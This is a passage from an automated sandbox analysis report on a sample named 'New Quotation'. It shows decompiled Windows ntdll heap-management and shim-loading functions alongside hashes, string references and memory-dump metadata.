                                                                                                                                                                                          • Instruction ID: 153b6b1d5fd3aae4f327d5769b48aca5f0376d8ffde268835db1b8410ab7667d
                                                                                                                                                                                          • Opcode Fuzzy Hash: de613d7c1fc806a3de9b7099b3f83cce2e4397649a2f6f11d76749917622f9d3
                                                                                                                                                                                          • Instruction Fuzzy Hash: D9411632A08645EFC712DF28C884BAAB3A4FF44735F048569E56A87391C738E980D7D7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D87ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • HEAP: , xrefs: 1D87ECDD
                                                                                                                                                                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1D87EDE3
                                                                                                                                                                                          • Entry Heap Size , xrefs: 1D87EDED
                                                                                                                                                                                          • ---------------------------------------, xrefs: 1D87EDF9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                                                          • API String ID: 3446177414-1102453626
                                                                                                                                                                                          • Opcode ID: f399f9e93f4b97bb163f2eebf992e8d92a95b906bab7ec34c94fdb5df99606c1
                                                                                                                                                                                          • Instruction ID: d5bd0e10b4b054f3e17e4f5ede1fe3ef913e4c945cf3a536ddee20aa518c82e6
                                                                                                                                                                                          • Opcode Fuzzy Hash: f399f9e93f4b97bb163f2eebf992e8d92a95b906bab7ec34c94fdb5df99606c1
                                                                                                                                                                                          • Instruction Fuzzy Hash: F2418175A00227DFC716CF1DC484AA97BB5FF49354B26846AE4089B360D731FC81CB82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                          			E1D7FDAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E1D899109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1D88F2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x1d8c3768; // 0x0
					 *0x1d8c91e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D7CB910();
					} else {
						E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D7CB910("Invalid heap signature for heap at %p", _t53);
					E1D7CB910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E1D7CB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1d8c47a1 = 1;
						asm("int3");
						 *0x1d8c47a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E1D7DFED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}









                                                                                                                                                                                          0x1d7fdac8
                                                                                                                                                                                          0x1d7fdacb
                                                                                                                                                                                          0x1d7fdad6
                                                                                                                                                                                          0x1d83f54e
                                                                                                                                                                                          0x1d7fdb0e
                                                                                                                                                                                          0x1d7fdb14
                                                                                                                                                                                          0x1d7fdb19
                                                                                                                                                                                          0x1d83f5ee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f5fd
                                                                                                                                                                                          0x1d7fdb24
                                                                                                                                                                                          0x1d7fdb27
                                                                                                                                                                                          0x1d83f614
                                                                                                                                                                                          0x1d83f61c
                                                                                                                                                                                          0x1d83f61c
                                                                                                                                                                                          0x1d83f614
                                                                                                                                                                                          0x1d7fdb2d
                                                                                                                                                                                          0x1d7fdb2f
                                                                                                                                                                                          0x1d7fdb31
                                                                                                                                                                                          0x1d7fdb31
                                                                                                                                                                                          0x1d7fdb1f
                                                                                                                                                                                          0x1d7fdb1f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fdb1f
                                                                                                                                                                                          0x1d7fdae3
                                                                                                                                                                                          0x1d83f559
                                                                                                                                                                                          0x1d83f561
                                                                                                                                                                                          0x1d83f567
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f567
                                                                                                                                                                                          0x1d7fdaf0
                                                                                                                                                                                          0x1d83f578
                                                                                                                                                                                          0x1d83f597
                                                                                                                                                                                          0x1d83f59c
                                                                                                                                                                                          0x1d83f57a
                                                                                                                                                                                          0x1d83f58f
                                                                                                                                                                                          0x1d83f594
                                                                                                                                                                                          0x1d83f5a8
                                                                                                                                                                                          0x1d83f5b7
                                                                                                                                                                                          0x1d83f5bc
                                                                                                                                                                                          0x1d83f5c1
                                                                                                                                                                                          0x1d83f5d3
                                                                                                                                                                                          0x1d83f5d5
                                                                                                                                                                                          0x1d83f5dc
                                                                                                                                                                                          0x1d83f5dd
                                                                                                                                                                                          0x1d83f5dd
                                                                                                                                                                                          0x1d83f5e4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fdaf6
                                                                                                                                                                                          0x1d7fdafa
                                                                                                                                                                                          0x1d7fdb02
                                                                                                                                                                                          0x1d7fdb07
                                                                                                                                                                                          0x1d7fdb07
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fdafa

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                          • API String ID: 3446177414-1222099010
                                                                                                                                                                                          • Opcode ID: a9bd257cdc40d71506b7c889b977c80b0b367c924da48ac26fe6f4bdcdf2e559
                                                                                                                                                                                          • Instruction ID: bbe61265f4a1a329dd7bbb1c3f8118b64c2a88854babd6061fb0bb3bd1388673
                                                                                                                                                                                          • Opcode Fuzzy Hash: a9bd257cdc40d71506b7c889b977c80b0b367c924da48ac26fe6f4bdcdf2e559
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB3124361087C4EFD722CF28C808BAA77A8EB05731F058585F46A477A2C779E940C693
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7F237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                                                                          			E1D7F237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x1d8c38b8; // 0x1
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x1d8c68d8; // 0x0
						if(_t22 != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x1d8c68d8 = _t50;
							 *0x1d8c5d4c = _t50;
						}
					}
					 *0x1d8c38b8 = _t38;
					return _t55;
				}
				_t59 =  *0x1d8c68d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x1d8c38b8 = 0;
					_t55 = E1D851BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x1d8c68d8; // 0x0
						while( *_t51 != 0) {
							 *0x1d8c91e0(_t51, 0, 1, 1, 0, 1, 0x10);
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x1d8c9218; // 0x0
						_v12 = _t30;
						_t45 = 0x20;
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E1D7DFED0(0x1d8c32d8);
						if( *0x1d8c65f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E1D7C6704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x1d8c32d8);
						E1D7DE740(_t46);
						goto L21;
					}
					_t36 =  *0x1d8c37c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E1D84E692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x1d8c37c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}




















                                                                                                                                                                                          0x1d7f2383
                                                                                                                                                                                          0x1d7f238b
                                                                                                                                                                                          0x1d7f238d
                                                                                                                                                                                          0x1d7f2390
                                                                                                                                                                                          0x1d7f2393
                                                                                                                                                                                          0x1d7f2397
                                                                                                                                                                                          0x1d7f23a5
                                                                                                                                                                                          0x1d7f23a8
                                                                                                                                                                                          0x1d7f23aa
                                                                                                                                                                                          0x1d7f23b1
                                                                                                                                                                                          0x1d83a878
                                                                                                                                                                                          0x1d83a87d
                                                                                                                                                                                          0x1d83a883
                                                                                                                                                                                          0x1d83a883
                                                                                                                                                                                          0x1d7f23b1
                                                                                                                                                                                          0x1d7f23ba
                                                                                                                                                                                          0x1d7f23c3
                                                                                                                                                                                          0x1d7f23c3
                                                                                                                                                                                          0x1d7f2399
                                                                                                                                                                                          0x1d7f239f
                                                                                                                                                                                          0x1d83a784
                                                                                                                                                                                          0x1d83a78f
                                                                                                                                                                                          0x1d83a793
                                                                                                                                                                                          0x1d83a7cd
                                                                                                                                                                                          0x1d83a80b
                                                                                                                                                                                          0x1d83a7e3
                                                                                                                                                                                          0x1d83a7e9
                                                                                                                                                                                          0x1d83a7ee
                                                                                                                                                                                          0x1d83a866
                                                                                                                                                                                          0x1d83a85f
                                                                                                                                                                                          0x1d83a85f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83a85f
                                                                                                                                                                                          0x1d83a7f0
                                                                                                                                                                                          0x1d83a7f2
                                                                                                                                                                                          0x1d83a7f2
                                                                                                                                                                                          0x1d83a7f5
                                                                                                                                                                                          0x1d83a7f5
                                                                                                                                                                                          0x1d83a7f8
                                                                                                                                                                                          0x1d83a7fb
                                                                                                                                                                                          0x1d83a808
                                                                                                                                                                                          0x1d83a808
                                                                                                                                                                                          0x1d83a812
                                                                                                                                                                                          0x1d83a817
                                                                                                                                                                                          0x1d83a81f
                                                                                                                                                                                          0x1d83a825
                                                                                                                                                                                          0x1d83a826
                                                                                                                                                                                          0x1d83a82d
                                                                                                                                                                                          0x1d83a82f
                                                                                                                                                                                          0x1d83a83b
                                                                                                                                                                                          0x1d83a83d
                                                                                                                                                                                          0x1d83a849
                                                                                                                                                                                          0x1d83a850
                                                                                                                                                                                          0x1d83a850
                                                                                                                                                                                          0x1d83a849
                                                                                                                                                                                          0x1d83a855
                                                                                                                                                                                          0x1d83a85a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83a85a
                                                                                                                                                                                          0x1d83a795
                                                                                                                                                                                          0x1d83a79c
                                                                                                                                                                                          0x1d83a7b4
                                                                                                                                                                                          0x1d83a7b9
                                                                                                                                                                                          0x1d83a7be
                                                                                                                                                                                          0x1d83a7c3
                                                                                                                                                                                          0x1d83a7c5
                                                                                                                                                                                          0x1d83a7c5
                                                                                                                                                                                          0x1d83a7c6
                                                                                                                                                                                          0x1d83a7c6
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • LdrpDynamicShimModule, xrefs: 1D83A7A5
                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1D83A7AF
                                                                                                                                                                                          • apphelp.dll, xrefs: 1D7F2382
                                                                                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1D83A79F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                          • API String ID: 0-176724104
                                                                                                                                                                                          • Opcode ID: b20185a6612ed55b6b8a9f2929e16d56489734112b5f2be254059728f6625508
                                                                                                                                                                                          • Instruction ID: b03f96a8c1e0c7cfcb9224bb8c09051e3519726927bba110772112c69590e346
                                                                                                                                                                                          • Opcode Fuzzy Hash: b20185a6612ed55b6b8a9f2929e16d56489734112b5f2be254059728f6625508
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF3139B5E00151FBD7209F59C8C5BEAB7B4FB84754F154069E918A7260D770E942CB82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E1D7CF8B0(signed int __edx, signed int _a4) {
				signed int _v8;
				void* _v28;
				void* _v54;
				void* _v60;
				void* _v64;
				char _v88;
				void* _v90;
				signed int _v92;
				char _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t73;
				signed int* _t86;
				signed int _t87;
				signed int _t91;
				char* _t92;
				char _t96;
				void* _t102;
				signed int* _t105;
				intOrPtr _t106;
				void* _t107;
				signed int* _t110;
				signed int _t111;
				char* _t118;
				signed int _t121;
				signed int _t127;
				void* _t128;
				void* _t129;
				signed int _t131;
				signed int _t132;
				void* _t139;
				signed int _t161;
				void* _t162;
				void* _t164;
				intOrPtr* _t166;
				void* _t169;
				signed int* _t170;
				signed int* _t171;
				signed int _t174;
				signed int _t176;

				_t158 = __edx;
				_t176 = (_t174 & 0xfffffff8) - 0x64;
				_v8 =  *0x1d8cb370 ^ _t176;
				_push(_t128);
				_t161 = _a4;
				if(_t161 == 0) {
					__eflags =  *0x1d8c6960 - 2;
					if( *0x1d8c6960 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(HeapHandle != NULL)");
						E1D7CB910();
						__eflags =  *0x1d8c5da8;
						if(__eflags == 0) {
							_t139 = 2;
							E1D88FC95(_t128, _t139, _t161, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t162);
					_pop(_t164);
					_pop(_t129);
					return E1D814B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
				}
				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
					_t73 =  *[fs:0x30];
					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
						L30:
						_t62 = _t161;
						goto L27;
					}
					_t141 =  *(_t161 + 0x10);
					__eflags =  *(_t161 + 0x10);
					if( *(_t161 + 0x10) != 0) {
						_t158 = _t161;
						E1D8778DE(_t141, _t161, 0, 8, 0);
					}
					E1D7CFD8E(_t161, _t158);
					E1D8902EC(_t161);
					_t158 = 1;
					E1D7C918A(_t161, 1, 0, 0);
					E1D898E26(_t161);
					goto L26;
				}
				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
					_t166 =  *0x1d8c3758; // 0x0
					 *0x1d8c91e0(_t161);
					_t62 =  *_t166();
					goto L27;
				}
				_t7 = _t161 + 0x58; // 0x8953046a
				_t147 =  *_t7;
				if( *_t7 != 0) {
					_t158 = _t161;
					E1D8778DE(_t147, _t161, 0, 8, 0);
				}
				E1D7CFD8E(_t161, _t158);
				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
					__eflags =  *(_t161 + 0x40) & 0x10000000;
					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t127 = E1D87F85F(_t161);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						E1D7DFED0(0x1d8c4800);
						E1D7CFAEC(_t161);
						_push(0x1d8c4800);
						E1D7DE740(_t161);
						_t86 = _t161 + 0x9c;
						_t131 =  *_t86;
						while(_t86 != _t131) {
							_t87 = _t131;
							_t158 =  &_v92;
							_t131 =  *_t131;
							_v92 = _t87 & 0xffff0000;
							_v96 = 0;
							E1D7CFABA( &_v92,  &_v96, 0x8000);
							_t91 = E1D7E3C40();
							__eflags = _t91;
							if(_t91 == 0) {
								_t92 = 0x7ffe0388;
							} else {
								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t92;
							if( *_t92 != 0) {
								_t158 = _v92;
								E1D88DA30(_t131, _t161, _v92, _v96);
							}
							_t86 = _t161 + 0x9c;
						}
						if( *((char*)(_t161 + 0xea)) == 2) {
							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
						} else {
							_t96 = 0;
						}
						if(_t96 != 0) {
							 *(_t176 + 0x1c) = _t96;
							_t158 = _t176 + 0x1c;
							_v88 = 0;
							E1D7CFABA(_t176 + 0x1c,  &_v88, 0x8000);
						}
						_t132 = _t161 + 0x88;
						if( *_t132 != 0) {
							 *((intOrPtr*)(_t176 + 0x24)) = 0;
							_t158 = _t132;
							E1D7CFABA(_t132, _t176 + 0x24, 0x8000);
							 *_t132 = 0;
						}
						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
						E1D7CFA44(_t169);
						if(_t169 != _t161) {
							goto L16;
						} else {
							_t102 = E1D7E3C40();
							_t170 = 0x7ffe0380;
							if(_t102 != 0) {
								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t105 = 0x7ffe0380;
							}
							if( *_t105 != 0) {
								_t106 =  *[fs:0x30];
								__eflags =  *(_t106 + 0x240) & 0x00000001;
								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
									_t121 = E1D7E3C40();
									__eflags = _t121;
									if(_t121 != 0) {
										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t170;
									}
									 *((short*)(_t176 + 0x2a)) = 0x1023;
									_push(_t176 + 0x24);
									_push("true");
									_push(0x402);
									_push( *_t170 & 0x000000ff);
									 *(_t176 + 0x54) = _t161;
									E1D812F90();
								}
							}
							_t107 = E1D7E3C40();
							_t171 = 0x7ffe038a;
							if(_t107 != 0) {
								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t110 = 0x7ffe038a;
							}
							if( *_t110 != 0) {
								_t111 = E1D7E3C40();
								__eflags = _t111;
								if(_t111 != 0) {
									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t171;
								}
								 *((short*)(_t176 + 0x4e)) = 0x1023;
								_push(_t176 + 0x48);
								_push("true");
								_push(0x402);
								_push( *_t171 & 0x000000ff);
								_v8 = _t161;
								E1D812F90();
							}
							if(E1D7E3C40() != 0) {
								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t118 = 0x7ffe0388;
							}
							if( *_t118 != 0) {
								E1D88D9C6(_t161);
							}
							goto L26;
						}
					}
				}
			}


















































                                                                                                                                                                                          0x1d7cf8b0
                                                                                                                                                                                          0x1d7cf8b8
                                                                                                                                                                                          0x1d7cf8c2
                                                                                                                                                                                          0x1d7cf8c6
                                                                                                                                                                                          0x1d7cf8c9
                                                                                                                                                                                          0x1d7cf8ce
                                                                                                                                                                                          0x1d82e467
                                                                                                                                                                                          0x1d82e46e
                                                                                                                                                                                          0x1d82e474
                                                                                                                                                                                          0x1d82e47a
                                                                                                                                                                                          0x1d82e47e
                                                                                                                                                                                          0x1d82e49d
                                                                                                                                                                                          0x1d82e4a2
                                                                                                                                                                                          0x1d82e480
                                                                                                                                                                                          0x1d82e495
                                                                                                                                                                                          0x1d82e49a
                                                                                                                                                                                          0x1d82e4a8
                                                                                                                                                                                          0x1d82e4ad
                                                                                                                                                                                          0x1d82e4b2
                                                                                                                                                                                          0x1d82e4ba
                                                                                                                                                                                          0x1d82e4c2
                                                                                                                                                                                          0x1d82e4c3
                                                                                                                                                                                          0x1d82e4c3
                                                                                                                                                                                          0x1d82e4ba
                                                                                                                                                                                          0x1d7cf9f6
                                                                                                                                                                                          0x1d7cf9f6
                                                                                                                                                                                          0x1d7cf9f8
                                                                                                                                                                                          0x1d7cf9fc
                                                                                                                                                                                          0x1d7cf9fd
                                                                                                                                                                                          0x1d7cf9fe
                                                                                                                                                                                          0x1d7cfa09
                                                                                                                                                                                          0x1d7cfa09
                                                                                                                                                                                          0x1d7cf8db
                                                                                                                                                                                          0x1d82e4cd
                                                                                                                                                                                          0x1d82e4d3
                                                                                                                                                                                          0x1d82e4d6
                                                                                                                                                                                          0x1d7cfa37
                                                                                                                                                                                          0x1d7cfa37
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cfa37
                                                                                                                                                                                          0x1d82e4dc
                                                                                                                                                                                          0x1d82e4e1
                                                                                                                                                                                          0x1d82e4e3
                                                                                                                                                                                          0x1d82e4e9
                                                                                                                                                                                          0x1d82e4eb
                                                                                                                                                                                          0x1d82e4eb
                                                                                                                                                                                          0x1d82e4f2
                                                                                                                                                                                          0x1d82e4f9
                                                                                                                                                                                          0x1d82e504
                                                                                                                                                                                          0x1d82e505
                                                                                                                                                                                          0x1d82e50c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82e50c
                                                                                                                                                                                          0x1d7cf8e8
                                                                                                                                                                                          0x1d82e516
                                                                                                                                                                                          0x1d82e51f
                                                                                                                                                                                          0x1d82e525
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82e525
                                                                                                                                                                                          0x1d7cf8ee
                                                                                                                                                                                          0x1d7cf8ee
                                                                                                                                                                                          0x1d7cf8f5
                                                                                                                                                                                          0x1d82e530
                                                                                                                                                                                          0x1d82e532
                                                                                                                                                                                          0x1d82e532
                                                                                                                                                                                          0x1d7cf8fd
                                                                                                                                                                                          0x1d7cf909
                                                                                                                                                                                          0x1d82e53c
                                                                                                                                                                                          0x1d82e543
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82e54b
                                                                                                                                                                                          0x1d82e550
                                                                                                                                                                                          0x1d82e552
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cf90f
                                                                                                                                                                                          0x1d7cf90f
                                                                                                                                                                                          0x1d7cf918
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cf91e
                                                                                                                                                                                          0x1d7cf924
                                                                                                                                                                                          0x1d7cf92b
                                                                                                                                                                                          0x1d7cf930
                                                                                                                                                                                          0x1d7cf931
                                                                                                                                                                                          0x1d7cf936
                                                                                                                                                                                          0x1d7cf93c
                                                                                                                                                                                          0x1d7cf93e
                                                                                                                                                                                          0x1d82e55d
                                                                                                                                                                                          0x1d82e55f
                                                                                                                                                                                          0x1d82e563
                                                                                                                                                                                          0x1d82e56a
                                                                                                                                                                                          0x1d82e578
                                                                                                                                                                                          0x1d82e57c
                                                                                                                                                                                          0x1d82e581
                                                                                                                                                                                          0x1d82e586
                                                                                                                                                                                          0x1d82e588
                                                                                                                                                                                          0x1d82e59a
                                                                                                                                                                                          0x1d82e58a
                                                                                                                                                                                          0x1d82e593
                                                                                                                                                                                          0x1d82e593
                                                                                                                                                                                          0x1d82e59f
                                                                                                                                                                                          0x1d82e5a2
                                                                                                                                                                                          0x1d82e5a8
                                                                                                                                                                                          0x1d82e5ae
                                                                                                                                                                                          0x1d82e5ae
                                                                                                                                                                                          0x1d82e5b3
                                                                                                                                                                                          0x1d82e5b3
                                                                                                                                                                                          0x1d7cf94d
                                                                                                                                                                                          0x1d7cfa0c
                                                                                                                                                                                          0x1d7cf953
                                                                                                                                                                                          0x1d7cf953
                                                                                                                                                                                          0x1d7cf953
                                                                                                                                                                                          0x1d7cf957
                                                                                                                                                                                          0x1d7cfa17
                                                                                                                                                                                          0x1d7cfa1b
                                                                                                                                                                                          0x1d7cfa28
                                                                                                                                                                                          0x1d7cfa2d
                                                                                                                                                                                          0x1d7cfa2d
                                                                                                                                                                                          0x1d7cf95d
                                                                                                                                                                                          0x1d7cf965
                                                                                                                                                                                          0x1d82e5c7
                                                                                                                                                                                          0x1d82e5cc
                                                                                                                                                                                          0x1d82e5ce
                                                                                                                                                                                          0x1d82e5d3
                                                                                                                                                                                          0x1d82e5d3
                                                                                                                                                                                          0x1d7cf96f
                                                                                                                                                                                          0x1d7cf981
                                                                                                                                                                                          0x1d7cf981
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cf987
                                                                                                                                                                                          0x1d7cf98d
                                                                                                                                                                                          0x1d7cf992
                                                                                                                                                                                          0x1d7cf999
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cf99b
                                                                                                                                                                                          0x1d7cf99b
                                                                                                                                                                                          0x1d7cf9a0
                                                                                                                                                                                          0x1d7cf9ac
                                                                                                                                                                                          0x1d82e5e3
                                                                                                                                                                                          0x1d7cf9b2
                                                                                                                                                                                          0x1d7cf9b2
                                                                                                                                                                                          0x1d7cf9b2
                                                                                                                                                                                          0x1d7cf9b7
                                                                                                                                                                                          0x1d82e5ea
                                                                                                                                                                                          0x1d82e5f0
                                                                                                                                                                                          0x1d82e5f7
                                                                                                                                                                                          0x1d82e5fd
                                                                                                                                                                                          0x1d82e602
                                                                                                                                                                                          0x1d82e604
                                                                                                                                                                                          0x1d82e60f
